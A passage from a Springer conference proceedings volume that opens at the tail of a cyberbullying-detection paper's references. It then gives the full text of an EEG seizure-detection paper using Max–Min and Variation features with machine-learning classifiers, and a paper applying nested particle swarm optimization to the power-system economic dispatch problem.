3(10), 685–696 (2019). https://doi.org/10.1016/s2352-4642(19)30186-5
3. Kumar, A., & Sachdeva, N. (2020) Cyberbullying checker: Online bully content detection using
hybrid supervised learning. In International Conference on Intelligent Computing and Smart
Communication 2019 (pp. 371–382). Springer, Singapore.
4. Kumar, A., & Sachdeva, N. (2020) Multi-input integrative learning using deep neural networks
and transfer learning for cyberbullying detection in real-time code-mix data. Journal of
Multimedia Systems, 66. https://doi.org/10.1007/s00530-020-00672-7
5. Kumar, A., & Sachdeva, N. (2019). Cyberbullying detection on social multimedia using soft
computing techniques: A meta-analysis. Journal Multimedia Tools Appl, 78, 23973–24010.
https://doi.org/10.1007/s11042-019-7234-z
6. Cénat, J. M., Hébert, M., Blais, M., Lavoie, F., Guerrier, M., & Derivois, D. (2014). Cyber-
bullying, psychological distress and self-esteem among youth in Quebec schools. Journal of
Affective Disorders, 169, 7–9. https://doi.org/10.1016/j.jad.2014.07.019
7. Sri Nandhini, B., & Sheeba, J. I. (2015, March). Cyberbullying detection and classification
using information retrieval algorithm. In ICARCSET ‘15: Proceedings of the 2015 Interna-
tional Conference on Advanced Research in Computer Science Engineering and Technology
(ICARCSET 2015), 20, 1–5. https://doi.org/10.1145/2743065.2743085.
8. Sri Nandhini, B., & Sheeba, J. I. (2015). Online social network bullying detection using intel-
ligence techniques. In International Conference on Advanced Computing Technologies and
Applications (ICACTA-2015), Procedia Computer Science (Vol 45. pp. 485–492). Elsevier.
9. Frommholz, I., Al-Khateeb, H. M., & Potthast, M. et al. (2016). On textual analysis and
machine learning for cyberstalking detection. Datenbank Spektrum, 16, 127–135. https://doi.
org/10.1007/s13222-016-0221-x
10. Radovic, A., Gmelin, T., Stein, B. D., & Miller, E. (2017). Depressed adolescents’ positive and
negative use of social media. Journal of Adolescence, 55, 5–15. https://doi.org/10.1016/j.ado
lescence.2016.12.002
11. Torous, J., Larsen, M. E., Depp, C., Cosco, T. D., Barnett, I., Nock, M. K., & Firth, J. .(2018).
Smartphones, sensors, and machine learning to advance real-time prediction and interventions
for suicide prevention: A review of current progress and next steps. Current Psychiatry Reports,
20(7).
12. Talpur, Bandeh A., & Declan, O’S. (2020). Cyberbullying severity detection: A machine
learning approach. PloS one, 15.10, e0240924.
13. Zhao, R., Anna Z., & Kezhi M. (2016). Automatic detection of cyberbullying on social networks
based on bullying features. In Proceedings of the 17th international conference on distributed
computing and networking (pp. 1–6).
14. Sachdeva, N., Renu D., and Akshi K.: Empirical analysis of Machine Learning Techniques for
context aware Recommender Systems in the environment of IoT. In Proceedings of the Inter-
national Conference on Advances in Information Communication Technology & Computing,
pp. 1–7.
15. Kumar, A., Nitin S., & A. (2017). Analysis of GA optimized ANN for proactive context aware
recommender system. In International Conference on Health Information Science (pp. 92–
102). Springer ,Cham.
16. Kumar, A., & Jaiswal, A. (2020). Deep learning based sentiment classification on user-
generated big data. In Recent advances in computer science and communications (Formerly:
Recent Patents on Computer Science) (Vol 13.5, pp. 1047–1056).
Cyberbullying-Mediated Depression Detection … 877

17. Kumar, A., & Jaiswal, A. (2020). A deep swarm-optimized model for leveraging industrial data
analytics in cognitive manufacturing. IEEE Transactions on Industrial Informatics. https://doi.
org/10.1109/TII.2020.3005532
18. Kumar, A., Jaiswal, A., Garg, S., Verma, S., & Kumar, S. (2019). Sentiment analysis using
cuckoo search for optimized feature selection on Kaggle tweets. International Journal of
Information Retrieval Research (IJIRR), 9(1), 1–15.
19. Kumar, A., & Garg, G. (2019). Sentiment analysis of multimodal twitter data. Multimedia Tools
and Applications, 78(17), 24103–24119.
20. Kumar, A., & Sachdeva, N. (2021). Multimodal cyberbullying detection using capsule network
with dynamic routing and deep convolutional neural network. Multimedia Systems, 1–10.
Improved Patient-Independent Seizure
Detection System Using Novel Feature
Extraction Techniques

Durgesh Nandini, Jyoti Yadav, Asha Rani, and Vijander Singh

Abstract The objective of this research work is to design an improved patient-


independent seizure detection system. In general, most of the patient-dependent EEG-
based seizure detection algorithms suffer from poor accuracy when applied to new
patients. Therefore, a generalized approach is suggested to design seizure detection
systems without the need of model retraining for new patients. This research work
proposes two novel time-domain feature extraction techniques, namely “Max–Min”
and “Variation” methods. The features are extracted using segment-based patient-
independent method from the ictal and interictal signal regions. Various machine
learning algorithms are used in this work for seizure detection. The experimentation
is performed on a publicly available CHB MIT EEG scalp dataset. The max–min
method results in the highest classification accuracy of 97.82% using the decision
tree algorithm, whereas the variation method provides the classification accuracy
of 92.04% using the scalable tree boosting algorithm. The proposed methods show
improved accuracy as compared to the state of the art methods

Keywords Epilepsy · Seizure · Machine learning · Decision tree · XGB ·


Patient-independent

D. Nandini (B) · J. Yadav · A. Rani · V. Singh


Department Instrumentation and Control Engineering, Netaji Subhas University of Technology,
New Delhi, India
e-mail: durgesh.ic18@nsut.ac.in
J. Yadav
e-mail: Jyoti.yadav@nsut.ac.in
A. Rani
e-mail: asha.rani@nsut.ac.in
V. Singh
e-mail: vijaydee@nsut.ac.in

© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 879
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_71
880 D. Nandini et al.

1 Introduction

Epilepsy is a neurological disease which severely impacts the lives of many patients.
At present, 65 million people worldwide are affected by this disease. An epileptic
seizure results in abnormal sensations that may range from the twitching of arms
to severe injuries and may even lead to death after strokes. Significant research
is carried out to detect epilepsy detect using electroencephalogram (EEG) signals.
Sriraam and Raghu [1] utilized the Bern-Barcelona EEG database to identify focal
and non-focal seizures. EEG signals are segmented in the window of 10 s duration.
The authors pre-processed the signal using a fourth-order Butterworth band-pass filter
in the frequency range of 0.5–150 Hz. The features extraction in time and frequency
domain are carried out along with information theory and statistical-based features.
The SVM classification algorithm achieves the highest sensitivity, specificity, and
classification accuracy. A real-time microcontroller-based prototype is employed by
Satarupa et al. [2]. Low-power consumption, quick and accurate seizure detection,
and easy software compatibility are the few attributes of the proposed prototype. The
EEG signals are pre-processed using LPF and features are extracted using a discrete
wavelet transform (DWT). Daubechies, Symlet, Bi-orthogonal, and Coiflet mother
wavelets are employed for multi-resolution analysis of the signals. Results reveal
high-classification accuracy using the ANN classifier. Zabihi et al. [3] presented a
patient-dependent approach employing a two-layer classification to detect seizures
using linear discriminant analysis and artificial neural network. Selvakumari et al.
[10] carried out their work on 12 channels placed in parietal and occipital lobes. The
work presented by them is a patient-dependent and obtains an accuracy of 95.63%.
Correa et al. [4] developed an algorithm for real-time and offline modes, based on
adaptive filters, signal averaging, and thresholds for seizure detection. Sadeghzadeh
et al. [5] introduced a two-level patient-dependent approach for seizure detection,
using three-level feature extractions from the pre-ictal stage of the EEG signal. These
signals are matched with the pre-defined threshold value to conclude the likelihood of
seizure occurrence. Fasil et al. [6] removed the unwanted noise from the EEG signals
using the butterworth filter, differential decomposition methods are used for signal
decomposition, then log-entropy and signal energy are extracted. An accuracy of 86%
with the SVM algorithm is obtained by the authors. Raghu et al. [7] presented a study
of the dynamic characteristics of EEG signals. The authors applied a modified version
of DWT, maximal overlap discrete wavelet transform to analyse EEG signals. The
highest obtained classification accuracy for CHB-MIT is 94.51%. Raghu and Sriraam
[8] extracted features in time as well as frequency domain. The SVM classifier
yields good results with an accuracy of 96.1%. Yang et al. [9] developed a novel
patient-independent seizure detection method and patient-dependent analysis is also
performed. Results reveal better classification accuracy for patient-dependent [10]
study, but it is difficult to apply to new patients.
The medical experts diagnose epilepsy by visually analyzing and inspecting the
EEG recordings. The manual process of analyzing the signal is time-consuming,
tedious, and susceptible to human error [9] due to the rise of 5 million epileptic
Improved Patient-Independent Seizure Detection … 881

patients per year. These issues may be effectively resolved using efficient feature
extraction and machine learning-based classification techniques. Further scalp EEG
measures the brain activities from the surface of the brain in a more easy, reliable,
and affordable way as compared to invasive EEG records. Therefore in this work, the
non-invasive CHB MIT scalp EEG dataset is used to design a patient-independent
epileptic seizure detection model. The two novel patient-independent segment-based
time-domain feature extraction techniques, i.e., “Min–Max” and “Variation” methods
are proposed. The feature extraction techniques are designed by considering the ictal
and interictal stages of a seizure. Various ML techniques are considered to classify
the signals as seizure or non-seizure category. A performance comparison of the
results obtained using various ML algorithms is also performed in this study. It is
observed that the results obtained using the proposed novel techniques are better in
comparison to the conventional methods. Further the performance of the proposed
epilepsy detection system is analyzed using various performance metrics.
The organization of this paper is given as follows: Section 2 explains the
suggested methodology of feature extraction and classification. Section 3 repre-
sents the obtained results and discussion of this work. Lastly, Sect. 4 presents the
conclusion of this work.

2 Methodology

The epileptic seizure detection system suggested in this research work comprises
signal acquisition, pre-processing, feature extraction and selection, and classification
stages. Figure 1 illustrates the schematic illustration of the epilepsy detection model.
The publicly available CHB MIT dataset consisting of scalp EEG recordings
from 22 subjects is considered for experimentation. The database is collected from 5
males and 17 females in the age group of 3–22 years and 1.5–19 years, respectively.
The recording of the scalp EEG is done using the international 10–20 electrode
position standards. The pre-processing of data involves the removal of unwanted
signal, power-line noise, and artifacts from the EEG signal. The CHB-MIT scalp

Fig. 1 Schematic illustration of the epileptic seizure detection model


882 D. Nandini et al.

EEG data is pre-processed using the 4th-order Butterworth band-pass filter in the
frequency band of 0.5–32 Hz. This study includes all the channels except the duplicate
EEG channel “T8-P8.” The EEG signal is segmented into small bits by applying a
non-overlapping sliding window of 6 s duration each [9]. The recordings for patients
12 and 16 are excluded in this study, owing to their short interictal and ictal regions.
The seizure regions are characterized by oscillatory patterns, sharp spikes, and a
rapid sequence of the fast action potential in the EEG signal. These characteristics
are used to design an epileptic seizure detection model. In this work, the EEG scalp
database is used to extract “Max–min” and ‘Variation’ based features. These feature
sets are derived using segment-based approaches [9, 10]. The operation involves
the study of epileptiform activity for seizure analysis. The ictal and interictal signal
segments are considered in the analysis. The ictal regions are the regions associated
with the occurrence of seizure attacks. The region in the EEG signal that occurs
between the seizures is known as the interictal region.

2.1 Feature Set 1: Max–Min Method

The Max–Min method is a variant of the method proposed by Yang et al. [9]. However
this method focuses on extracting the maximum and minimum values from the ictal
and interictal regions. The Max–Min procedure for feature extraction is given as
follows:
1. The ictal and the interictal region are divided into smaller windows using a
non-overlapping window of 6 s each in duration.
2. The maximum (pi ) and minimum (qi ) values corresponding to each 6 s region
for all channels are retrieved and stored as multiple pairs of maximum and
minimum values corresponding to the ictal and interictal region.
3. A one-dimensional array (pqabs ) is created that gives the absolute difference
between the maximum and minimum values.

pqabs = [| p1 − q1 |, | p2 − q2 |, | p3 − q3 | · · · | pi − qi |] (1)

4. Lastly, the various time-domain statistical features, i.e., minimum, maximum,


mean, standard deviation, and variance corresponding to all EEG channels are
computed.
The interictal activity is longer in comparison to the ictal activity. Therefore, the
duration of the ictal activity is taken as a reference for feature extraction. The first
10-min duration of the interictal region is not considered in this study.
Improved Patient-Independent Seizure Detection … 883

2.2 Feature Set 2: The Variation Method

This method is an extension of the Max–Min method and uses the maximum (pi )
and minimum (qi ) values corresponding to ictal and interictal regions. The mean of
the maximum values corresponding to the ictal and interictal regions is subtracted
from all maximum and minimum values. This method provides the information about
average maximum and minimum value for the seizure and non-seizure region and the
difference between mean value and ictal and interictal regions. Total 76,111 voltage
values are calculated for all the subjects.


k
meanictal = pi (2)
i=0


k
meaninter = qi (3)
i=0

ictalvarmax = pi − meanictal (4)

ictalvarmin = qi − meanictal (5)

intervarmax = pi − meaninter (6)

intervarmin = qi − meaninter (7)

2.3 Classification

This work demonstrates the comparison of different ML algorithms, i.e., support


vector machine (SVM), logistic regression, K-nearest neighbor (KNN), random
forest (RF), decision tree (DTree), Naïve Bayes(NB), Adaboost, gradient boost
(GBDT), scalable tree boosting algorithm (XGB), extra tree (Etree) for detection
and classification of epileptic seizures. In case of SVM gaussian (rbfSVM) and
linear (lSVM), kernel functions are considered. The k is assumed to be 6 for KNN
algorithm, whereas the logistic regression uses both the L1 & L2 regularizations. The
Naive Bayes algorithm (NBayes) uses Gaussian kernel and the number of trees in the
RF & ETree algorithms is taken as 10 with entropy criterion. The number of boosting
stages for the boosting GBDT, AdaBoost, and XGB is taken as 100 with a default
learning rate value of 0.1 and the maximum depth is considered to be 3. In decision
tree algorithm, entropy criterion is used. Decision trees are a non-parametric, highly
interpretable and easy-to-understand classification algorithm. In this, the decision
884 D. Nandini et al.

model is created by learning simple decision rules. It has low model complexity and
fast running speed [9]. Scalable tree Boosting algorithm (XGB) is the faster running
version of gradient boosting decision tree algorithm. The performance of the ML
classifiers is evaluated using the confusion matrix. Further the performance evalua-
tion of ML algorithms is carried out using accuracy, Mathew’s correlation coefficient
(MCC), sensitivity, Cohen’s Kappa metric, and specificity [9].

3 Results and Discussion

This research work presents a segment-based patient-independent approach to detect


epileptic seizures using the ML algorithm. The CHB-MIT EEG scalp dataset is
considered for the analysis. The raw EEG signals are pre-processed and segmented
into non-overlapping windows for feature extraction. The ML algorithms are consid-
ered for classification of signals as seizure/non-seizure. The extracted feature dataset
is divided as 75% training and 25% testing dataset, and the obtained results are vali-
dated with the help of tenfold cross-validation method. This performance of the ML
classifiers is tested on the two feature sets. Table 1 gives us the list of ML algorithms
used in this study along with their hyperparameter values.

Table 1 Specifications of the considered ML algorithms


S. No ML algorithm Hyperparameters
1 SVM Gaussian Kernel (rbfSVM)
Linear Kernel function (lSVM)
2 KNN Number of neighbors = 6
3 Logistic regression L1 regularization, random_state = 0
L2 regularization, random_state = 0
4 RF Number of estimators = 10, criterion = ‘entropy’,
random_state = 0
5 NBayes Gaussian kernel
6 DTree Entropy criterion, random_state = 0
7 Adaboost Number of estimators = 100, random_state = 0
8 GBDT Number of estimators = 100, learning_rate = 1.0,
random_state = 0, maximum_depth = 1
9 XGB Number of estimators = 100, learning_rate = 1.0,
random_state = 0, maximum_depth = 4
10 ETree Number of estimators = 10, min_samples_split = 2
Improved Patient-Independent Seizure Detection … 885

Fig. 2 Graphical illustration of Max–Min feature extraction technique

3.1 Seizure Detection ML Model Based on Max–Min Feature


Set

The Max–Min method extracts the maximum and minimum values from the ictal
and interictal region of the CHB MIT EEG dataset. Then, the absolute difference
between the maximum and the minimum values is evaluated. Finally, the minimum,
maximum, mean, standard deviation, and variance values corresponding to all the
channels are calculated. For example there are 7 seizure files and 35 non-seizure
files for subject chb01. The duration of the seizure files is taken as reference and the
duration of the interictal region is chosen randomly such that it matches the duration
of the ictal region. The duration of each ictal and interictal region is divided into a
non-overlapping window of 6 s each. So, the duration for seizure for the chb01_03.edf
file is 40 s. Thus, a pair of 22 × (40/6) = 154 maximum and minimum voltage values
corresponding to file 1 are obtained. Similarly, the voltage values corresponding to all
the EEG channels are calculated, resulting in a total of 38,044 pairs of voltage values.
Figure 2 graphically illustrates the proposed Max–Min feature extraction method.
The performance of the ML classifier using the Max–Min method is depicted in
Fig. 3. The graph shows that the highest accuracy of 97.82% is achieved using the
decision tree classifier.

3.2 Seizure Detection ML Model Using Variation Feature Set

Figure 4 graphically illustrates the concept of feature extraction using the variation
method. The variation method works on the principle similar to Max–Min method. In
this, the mean maximum values are calculated corresponding to the ictal and interictal
regions. Later, the absolute difference between the maximum value and mean value
is calculated. Similarly, the absolute difference between the minimum and mean
886 D. Nandini et al.

Fig. 3 Seizure detection performance comparison of machine learning algorithm using max–min
method

Fig. 4 Graphical illustration of variation feature extraction technique

values is obtained. The variation method performance analysis using various ML


classifiers is shown in Fig. 5. It achieves the highest accuracy of 92.40% using
the XGB algorithm. The decision tree algorithm gives an accuracy of 91.38%. The
performance metrics for the proposed Max-min and the variation methods is shown
in Table 2.
The performance comparison of suggested methodology with the traditional tech-
niques present in the literature is shown in Table 3. Yang et al. [9] achieved the
classification with 0.8627 accuracy. The model used 30 features optimized using
BackFs filter method. Satpura et al. [2] achieved the highest classification accuracy
of 0.9530. However, the proposed Max–Min method uses 5 features and achieves an
accuracy value 0.9782, which is 11.55% greater than the method discussed by [9].
The results also reveal that the proposed scheme achieves higher accuracy than the
methods employed by Yang et al. [9] and Satarupa [2].
Improved Patient-Independent Seizure Detection … 887

Fig. 5 Seizure detection performance comparison of machine learning algorithm the variation
method

Table 2 Comparative analysis of the performance metrics for the proposed seizure detection model
Performance ML Accuracy Sensitivity Specificity MCC (%) Kappa (%)
parameters algorithm (%) (%) (%)
Max–min Dtree 97.82 97.86 97.86 95.91 95.91
method
Variation XGB 92.40 95.03 95.03 85.02 84.90
method

Table 3 Comparative performance analysis with state of art methods


Paper Category Accuracy (%) Sensitivity (%) Specificity (%)
Yang et al. [9] Patient-independent 86.27 80.32 92.22
Satarupa [2] Patient-independent 95.30 87.50 83.60
Proposed approach Patient-independent 97.82 97.86 97.86
Max–Min method

4 Conclusions

This research work proposes a patient-independent segment-based approach for


the detection of an epileptic seizure by analysing ictal and interictal segments of
EEG signals. The segment-based approach is a more targeted and fast approach for
seizure detection. Two novel feature sets based on Min–Max and variation methods
are extracted from the pre-processed database. Various ML algorithms are used to
study the classification performance of the extracted features. The Max–Min method
achieves the highest classification accuracy of 97.82% using the decision tree algo-
rithm. The variation method provides the highest classification accuracy of 92.40%
888 D. Nandini et al.

using the XGB algorithm. Thus, min–max and variation methods achieve the classi-
fication accuracy of 11.55 and 2.52% greater than the methods discussed by [2, 9],
respectively. It is also revealed that the suggested methods use less than 5 features
thus reducing the data dimension to a large extent. In future, other stages of seizures
may be classified with the help of integrated feature sets and various feature selection
and channel selection methods.

References

1. Sriraam, N., & Raghu, S. (2017). Classification of focal and non focal epileptic seizures using
multi-features and SVM classifier. Journal of Medical Systems, 41(10), 1–14.
2. Chakrabarti, S., Swetapadma, A., Ranjan, A., & Pattnaik, P. K. (2020). Time domain imple-
mentation of pediatric epileptic seizure detection system for enhancing the performance of
detection and easy monitoring of pediatric patients. Biomedical Signal Processing and Control,
59, 101930.
3. Zabihi, M., Kiranyaz, S., Jäntti, V., Lipping, T., & Gabbouj, M. (2019). Patient-specific seizure
detection using nonlinear dynamics and nullclines. IEEE Journal of Biomedical and Health
Informatics, 24(2), 543–555.
4. Correa, A. G., Orosco, L. L., Diez, P., & Leber, E. L. (2019). Adaptive filtering for epileptic
event detection in the EEG. Journal of Medical and Biological Engineering, 39(6), 912–918.
5. Sadeghzadeh, H., Hosseini-Nejad, H., & Salehi, S. (2019). Real-time epileptic seizure predic-
tion based on online monitoring of pre-ictal features. Medical and Biological Engineering and
Computing, 57(11), 2461–2469.
6. Fasil, O. K., Rajesh, R., & Thasleema, T. M. (2018). Fusion of signal and differential signal
domain features for epilepsy identification in electroencephalogram signals. In Advances in
data and information sciences (pp. 127–135). Springer.
7. Raghu, S., Sriraam, N., Temel, Y., Rao, S. V., Hegde, A. S., & Kubben, P. L. (2019). Performance
evaluation of DWT based sigmoid entropy in time and frequency domains for automated
detection of epileptic seizures using SVM classifier. Computers in Biology and Medicine, 110,
127–143.
8. Raghu, S., & Sriraam, N. (2018). Classification of focal and non-focal EEG signals using
neighborhood component analysis and machine learning algorithms. Expert Systems with
Applications, 113, 18–32.
9. Yang, S., Li, B., Zhang, Y., Duan, M., Liu, S., Zhang, Y., Feng, X., Tan, R., Huang, L., & Zhou,
F. (2020). Selection of features for patient-independent detection of seizure events using scalp
EEG signals. Computers in Biology and Medicine, 119, 103671.
10. Selvakumari, R. S., Mahalakshmi, M., & Prashalee, P. (2019). Patient-specific seizure detection
method using hybrid classifier with optimized electrodes. Journal of Medical Systems, 43(5),
1–7.
Solution to Economic Dispatch Problem
Using Modified PSO Algorithm

Amritpal Singh and Aditya Khamparia

Abstract This research paper proposes a novel approach which is the extension
of the PSO algorithm aims at solving the economic dispatch problem. Economic
dispatch problem needs to be overcome by minimizing fuel cost which comes from
the generating units. Several constraints have been incorporated in the calculation
of the overall operating cost of power system operation. From the economic point
of view, it has been a matter of concern for most of the companies and needs to be
solved.

Keywords Economic dispatch · Unit commitment · PSO

1 Introduction

A power system has quite a lot of power plants. Each power plant has several gener-
ating units [1]. Daily load patterns show signs of acute deviation amid the rush and
off-rush hours for the reason that the community utilizes a smaller amount of elec-
trical energy on Saturday than on weekdays, and at a lower rate between midnight
and early morning than during the day. If adequate generation to fulfill the rush is
kept online all through the day, it is promising that few of the units will be working
near their least generating threshold during the off rush period. In most of the unified
power systems, the power prerequisite primarily fulfills by thermal power genera-
tion. Quite a lot of working approaches are achievable to fulfill the requisite power
requirement. It is recommended to use the most favorable operating approach based
on the financial measure. That is to say significant, the decisive factor in power system
functioning is to meet the power demand at least fuel cost. Furthermore, sequentially
to provide first-rate electrical energy to consumers in a protected and cost-effective
method, economic dispatch is measured to be one of the best existing alternatives.
The major outcomes of the research are given as follows:
• This research aimed at solving the economic dispatch problem.

A. Singh (B) · A. Khamparia


Department of Computer Science and Engineering, Lovely Professional University, Punjab, India

© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 889
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_72
890 A. Singh and A. Khamparia

• Formulated a novel approach which is the extension of PSO algorithm.

2 Unit Commitment

Unit commitment belongs to a class of optimization problem which is used to decide


the functioning agenda of generators with changeable loads. It involves how many
units need to be put in the working state, how many units need to be put in an
inactive state, and how much power one unit needs to generate to satisfy load demand.
Unit commitment popularly known as the UC problem needs to be overcome by
minimizing fuel cost, startup cost and shutdown cost which come from the generating
units. A lot of methods using some form of estimation and generality have been
planned [2–5]. The UC problem can be formulated mathematically and representation
is given below (Eq. 1):

min f i (xit , u it−1 , u it ) (1)
x,u
i∈I t∈T

fi denotes cost function


xit denotes generation level
u it denotes unit’s state

The constraints which play a significant role are as follows:

2.1 Generation Capacity Constraint

For regular system operations, the actual power output of each unit is between its
upper and lower limits as follows (Eq. 2):

Pimin ≤ Pi ≤ Pimax (2)

2.2 Power Balance Constraint

Equilibrium is reached when the net electricity generation is equal to the overall
demand and the actual power loss in transmission lines (Eq. 3):


n
Pi = D + Pl (3)
i=1
Solution to Economic Dispatch Problem Using Modified … 891

2.3 Generation Ramp Limits

The operational range of online generators is constrained by their limits on ramp rate
[6]. Three potential scenarios occur while the generator units are online.
• The generating unit operates in a steady state.
• The generating unit increases its generation of power.
• The generating unit decreases its generation of power.
As generation increases (Eq. 4),

PZi − PZi0 ≤ URi (4)

As generation decreases (Eq. 5),

PZi0 − PZi ≤ DRi (5)

3 Introduction to Economic Dispatch (ED)

Economic dispatch problem deal with discovering the extent of power each gener-
ating unit should produce for given power demand, with the condition of reduction
in aggregate operational cost [7–11] (Eq. 6).

FT = F1 + F2 + F3 + · · · + FN

N
= Fi Pi
i=1


N
φ = 0 = Ploss + Pload − Pi (6)
i=1

The function of an economic dispatch problem is defined as follows (Eq. 7).


n
 
min F = ai + bi Pi + ci Pi2 (7)
T
i=1

Here F T denotes overall fuel cost. F i (Pi ) denotes the cost of ith generating unit
in $/hr. Pi denotes ith unit’s power in MW, n denotes aggregate of generating units.
Lastly, a, b and c are generating unit’s cost coefficients.
892 A. Singh and A. Khamparia

Fig. 1 Working of PSO

4 Introduction to Particle Swarm Optimization (PSO)

Particle swarm optimization or PSO is motivated by the social behavior of birds [12,
13]. PSO is a very simple algorithm. However, it is a powerful algorithm too. Two
principles are used behind the functioning of PSO which are communication which
is informing the measure to the other party plus learning. The algorithm aims at
finding a global minimum. The working of standard PSO is shown in Fig. 1.

5 Proposed Approach

Nested PSO is a PSO subgroup that resolves two or more issues concurrently [14–
17]. In the algorithm here, two PSOs are combined or nested to solve simultaneously
associated concerns. There is an outer and an inner PSO working together here. The
advantage is that when achieving another one, it is easy to achieve two objectives
by considering another goal. The working of the proposed methodology is shown in
Fig. 2.
PSO tried to obtain ED-generating answers in each iteration. To meet the system
demand and realistic operating constraints of generating units that include ramp up
and down rate limits and prohibited operating zones, economic dispatch planning
must conduct the optimized dispatch between the operating generating units as stated
in Table 1.
Solution to Economic Dispatch Problem Using Modified … 893

Fig. 2 Relationship between


internal and external PSO

Table 1 Characteristics and Initial status of units


Unit P min P max a ($) b ($/MW) c ($/MW2 ) UR(MW/h) DR PZ (MW)
(MW) (MW) (MW/h)
1 100 500 240 7.0 0.0070 80 120 [210–240],
[350–380]
2 50 200 200 10.0 0.0095 50 90 [90–110],
[140–160]
3 80 300 220 8.5 0.0090 65 100 [150–170],
[210–240]
4 50 150 200 11.5 0.0090 50 90 [80–90],
[110–120]
5 50 200 220 10.5 0.0080 50 90 [90–110],
[140–150]
6 50 120 190 12.0 0.0075 50 90 [75–85],
[100–105]
894 A. Singh and A. Khamparia

5.1 Working of the Proposed Approach (Pseudo Code)

1. Take Generator Data


2. Setting Up PSO Parameters
Maximum Iterations (N)
Size of the population (P)
Constriction Coefficients
Inertia Weight Damping Ratio
Personal Learning and Global Learning Coefficient
Velocity Limits
3. Initialization of Position, Cost, and Velocity of particles
for i=1:P
Initialize Position
Initialize Velocity
Evaluation
Update Personal and Global Best
end for
4. Beginning of the main loop of PSO
for j=1:N
for i=1:P
Update Velocity
Apply Velocity Limits
Update Position
Apply Position Limits
Update Personal and Global Best
end for
end for
5. Evaluate Results

5.2 Experiment Design

The proposed approach is tested on systems composed of 6 units for a 24 h time


horizon. Table 1 summarizes the characteristics and initial status of units. The
corresponding minimum (MW Min.) and maximum (MW Max.) power generation
capacity of units in megawatts, the value of cost coefficients (a, b, and c), ramp rates
(UR and DR denotes ramp up and down rates, respectively) and prohibited zone
(PZ) has been shown. Table 2 summarizes the parameter settings of PSO. Parame-
ters include maximum iterations (N), swarm size (P), inertia weight (w), damping
Solution to Economic Dispatch Problem Using Modified … 895

Table 2 PSO parameters


Parameter PSO Nested PSO
setting
N 100 10
P 10 10
w 1 1
wdamp 0.99 0.99
c1 2 2
c2 2 2
phi1 2.05 2.05
phi2 2.05 2.05

ratio (wdamp), coefficient of personal learning, coefficient of global learning (c1 and
c2 ) and constriction coefficients (phi1 and phi2).
The loss coefficients can be defined with matrix B as follows.
⎡ ⎤
0.0017 0.0012 0.0007 −0.0001 −0.0005 −0.0002
⎢ 0.0012 0.0014 0.0009 0.0001 −0.0006 −0.0001 ⎥
⎢ ⎥
⎢ ⎥
⎢ 0.0007 0.0009 0.0031 0.0000 −0.0010 −0.0006 ⎥
⎢ ⎥
⎢ −0.0001 0.0001 0.0000 0.0024 −0.0006 −0.0008 ⎥
⎢ ⎥
⎣ −0.0005 −0.0006 −0.0010 −0.0006 0.0129 −0.0002 ⎦
−0.0002 −0.0001 −0.0006 −0.0008 −0.0002 0.0150

6 Results

Figure 3 shows the external iteration for optimizing cost. Figure 4 shows the total
decrease in cost. The proposed technique has considered the ten iterations as the
external iterations and sub iteration further consist of hundred iterations. The opti-
mized cost turned out to be 197,320$. The implementation has been done using
MATLAB with Intel Core i5 of 3.4 GHz and 4 gigabytes RAM configuration.

7 Conclusion

In this paper, modified PSO is utilized to work out the economic dispatch (ED)
problem. The proposed technique has been taken into account various constraints
include ramp up and down costs and other constraints. The proposed technique has
given promising results.
896 A. Singh and A. Khamparia

Fig. 3 Optimized cost

Fig. 4 Effect of iterations on cost


Solution to Economic Dispatch Problem Using Modified … 897

References

1. Wood, A. J., & Wollenberg, B. F. (2007). Power generation, operation and control (2nd ed).
Wiley.
2. Yu, X., Zhang, X. (2014). Unit commitment using Lagrangian relaxation and particle swarm
optimization. International Journal of Electrical Power and Energy Systems
3. Singh, A., & Kumar, S. (2016). Differential evolution: An overview. Advances in Intelligent
Systems and Computing. https://doi.org/10.1007/978-981-10-0448-3_17
4. Anand, H., Narang, N., & Dhillon, J. S. (2018). Profit based unit commitment using hybrid
optimization technique. Energy. https://doi.org/10.1016/j.energy.2018.01.138
5. Singh, A., & Khamparia, A. (2020). A hybrid whale optimization-differential evolution and
genetic algorithm based approach to solve unit commitment scheduling problem: WODEGA.
Sustainable Computing: Informatics and Systems. https://doi.org/10.1016/j.suscom.2020.
100442
6. Deka, D., & Datta, D. (2019). Optimization of unit commitment problem with ramp-rate
constraint and wrap-around scheduling. Electric Power Systems Research. https://doi.org/10.
1016/j.epsr.2019.105948
7. Xin-gang, Z., Ze-qi, Z., Yi-min, X., & Jin, M. (2020). Economic-environmental dispatch of
microgrid based on improved quantum particle swarm optimization. Energy. https://doi.org/
10.1016/j.energy.2020.117014
8. Wang, Q.-G., Ming, Yu., & Liu, J. (2020). An integrated solution for optimal generation oper-
ation efficiency through dynamic economic dispatch. Materials Today: Proceedings. https://
doi.org/10.1016/j.matpr.2020.03.535
9. Chen, Xu., Li, K., Bin, Xu., & Yang, Z. (2020). Biogeography-based learning particle swarm
optimization for combined heat and power economic dispatch problem. Knowledge-Based
Systems. https://doi.org/10.1016/j.knosys.2020.106463
10. Hailiang, Xu., Meng, Z., & Wang, Y. (2020). Economic dispatching of microgrid considering
renewable energy uncertainty and demand side response. Energy Reports. https://doi.org/10.
1016/j.egyr.2020.11.261
11. Goudarzi, A., Li, Y., & Xiang, Ji. (2020). A hybrid non-linear time-varying double-weighted
particle swarm optimization for solving non-convex combined environmental economic
dispatch problem. Applied Soft Computing. https://doi.org/10.1016/j.asoc.2019.105894
12. Kennedy, J., & Eberhart, R. (1995). Particle swarm optimization. In Proceedings of ICNN’95—
International Conference on Neural Networks, Perth, WA, Australia. https://doi.org/10.1109/
ICNN.1995.488968
13. Shi, Y., & Eberhart, R. (1998). A modified particle swarm optimizer. In 1998 IEEE Inter-
national Conference on Evolutionary Computation Proceedings. IEEE World Congress on
Computational Intelligence. https://doi.org/10.1109/ICEC.1998.699146
14. Eberhart, R. C., Groves, D. J., & Woodward, J. K. (2017). Deep swarm: Nested particle swarm
optimization. In 2017 IEEE Symposium Series on Computational Intelligence (SSCI), Honolulu,
HI. https://doi.org/10.1109/SSCI.2017.8280920
